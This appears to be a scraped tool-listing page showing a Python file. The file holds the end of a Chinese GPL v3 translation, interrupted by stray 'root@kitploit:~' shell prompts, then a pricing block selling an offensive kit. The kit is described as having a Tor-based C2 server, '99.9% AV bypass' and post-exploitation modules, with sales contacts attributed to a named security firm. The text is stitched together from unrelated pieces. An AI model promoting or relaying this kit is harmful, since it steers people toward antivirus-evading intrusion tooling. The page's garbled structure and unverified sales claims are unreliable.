如果专利许可未在其覆盖范围内包括、禁止行使或以致于不行使本许可特别授予的一项或多项权利为条件,则该专利许可是“歧视性的”。如果您与从事软件分发业务的第三方达成安排,根据该安排您基于传达作品的活动程度向第三方付款,且该第三方向任何将从您处接收受保护作品的当事方授予歧视性专利许可 (a) 与您传达的受保护作品副本(或由这些副本制成的副本)相关,或 (b) 主要针对并涉及包含受保护作品的特定产品或汇编,则您不得传达受保护作品,除非您在该安排或该专利许可授予之前(即 2007 年 3 月 28 日之前)已达成该安排或该专利许可已授予。

本许可中的任何内容均不得解释为排除或限制任何默示许可或根据适用专利法您可能享有的其他侵权抗辩。

  1. 不放弃他人的自由。

如果对您施加的条件(无论是通过法院命令、协议或其他方式)与本许可的条件相矛盾,这些条件不能免除您遵守本许可条件的义务。如果您无法同时满足本许可下的义务和任何其他相关义务来传达受保护作品,那么您可能根本无法传达它。例如,如果您同意要求您向接收您传达程序的人收取进一步传达版税的条款,那么您同时满足这些条款和本许可的唯一方式就是完全停止传达程序。

  1. 与 GNU Affero 通用公共许可证一起使用。

尽管本许可有任何其他规定,您有权将任何受保护作品与根据 GNU Affero 通用公共许可证第 3 版许可的作品链接或组合成单一组合作品,并传达由此产生的作品。本许可的条款将继续适用于作为受保护作品的部分,但 GNU Affero 通用公共许可证第 13 节关于通过网络交互的特殊要求将适用于该组合本身。

  1. 本许可的修订版本。

自由软件基金会可能不时发布 GNU 通用公共许可证的修订版和/或新版本。此类新版本在精神上将与当前版本相似,但在细节上可能有所不同,以解决新问题或新关切。

每个版本都有一个独特的版本号。如果本程序指定某个编号版本的 GNU 通用公共许可证“或任何后续版本”适用于它,您可以选择遵循该编号版本或自由软件基金会发布的任何后续版本的条款和条件。如果本程序未指定 GNU 通用公共许可证的版本号,您可以选择自由软件基金会发布的任何版本。

如果本程序指定代理机构可以决定可以使用哪些未来版本的 GNU 通用公共许可证,则该代理机构公开声明接受某个版本即永久授权您为该程序选择该版本。

后续许可证版本可能授予您额外或不同的权限。但是,您选择遵循后续版本不会对任何作者或版权持有人施加额外义务。

  1. 保证免责声明。

在适用法律允许的范围内,本程序不提供任何保证。除非另有书面说明,版权持有人和/或其他方按“现状”提供本程序,不附带任何明示或暗示的保证,包括但不限于适销性和特定用途适用性的暗示保证。本程序的质量和性能的全部风险由您承担。如果本程序被证明有缺陷,您承担所有必要服务、维修或更正的费用。

  1. 责任限制。

除非适用法律要求或书面同意,任何版权持有人或任何其他按上述规定修改和/或传达本程序的当事方,均不对您承担损害赔偿责任,包括因使用或无法使用本程序而产生的任何一般性、特殊性、偶然性或后果性损害(包括但不限于数据丢失或数据变得不准确,或您或第三方遭受的损失,或本程序无法与其他程序协同运行),即使该持有人或其他方已被告知此类损害的可能性。

  1. 第 15 和 16 节的解释。

如果上述保证免责声明和责任限制根据其条款无法在本地产生法律效力,则审查法院应适用最接近绝对免除与本程序相关的所有民事责任的当地法律,除非本程序的副本附带保证或责任承担并收取费用。

root@kitploit:~
                 条款和条件结束

        如何将这些条款应用于您的新程序

如果您开发了一个新程序,并希望它对公众有最大可能的用处,实现这一目标的最佳方式是使其成为自由软件,让每个人都能根据这些条款重新分发和更改它。

为此,请将以下通知附加到程序中。最安全的做法是将它们附加到每个源文件的开头,以最有效地说明保证的排除;每个文件应至少包含“版权”行和完整通知的指向位置。

root@kitploit:~
<一行给出程序名称及其功能的简要说明。>
版权所有 (C) <年份>  <作者姓名>

本程序是自由软件:您可以根据自由软件基金会发布的 GNU 通用公共许可证的条款(许可证第 3 版或(由您选择)任何后续版本)重新分发和/或修改它。

本程序的发布希望它会有用,但不提供任何保证;甚至没有适销性或特定用途适用性的暗示保证。有关更多详细信息,请参阅 GNU 通用公共许可证。

您应该已收到 GNU 通用公共许可证的副本以及本程序。如果没有,请参阅 <https://www.gnu.org/licenses/>。

还要添加如何通过电子和纸质邮件联系您的信息。

如果程序进行终端交互,请在以交互模式启动时输出类似这样的简短通知:

root@kitploit:~
<程序>  版权所有 (C) <年份>  <作者姓名>
本程序绝对不提供任何保证;有关详细信息,请键入 `show w'。
这是自由软件,欢迎您在某些条件下重新分发它;有关详细信息,请键入 `show c'。

假设的命令 show w' 和 show c' 应显示通用公共许可证的相应部分。当然,您的程序的命令可能不同;对于 GUI 界面,您可以使用“关于框”。

您还应该让您的雇主(如果您是程序员)或学校(如果有)签署程序的“版权免责声明”(如有必要)。有关更多信息以及如何应用和遵循 GNU GPL,请参阅 https://www.gnu.org/licenses/。

GNU 通用公共许可证不允许将您的程序纳入专有程序。如果您的程序是子例程库,您可能会认为允许专有应用程序与库链接更有用。如果您想这样做,请使用 GNU 较宽松通用公共许可证代替本许可。但首先,请阅读 https://www.gnu.org/licenses/why-not-lgpl.html。 """

=============================================================================

文件结束

=============================================================================

PRICING_350K = """ 🔴 TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 ════════════════════════════════════════════

root@kitploit:~
                📋 许可证包含内容:
                • 完整源代码框架(21 个文件)
                • Docker C2 生产环境(Tor/Supervisor)
                • EpSiLoNPoInTFuCK v5.1(99.9% AV 绕过)
                • 内置 EpSiLoN v7 后渗透模块
                • 演示视频 + DVWA 实验环境搭建
                • 5000+ 行技术文档
                • 6 个月威胁情报支持

                📞 销售联系方式:
                +33 1 46 53 53 53(Orange Cyberdefense 巴黎)
                [email protected]
                

print(f"""{PRICING_350K} {LEGAL_DISCLAIMER} {LICENSE_GPL} {PACKAGE_CMD}""")

下载工具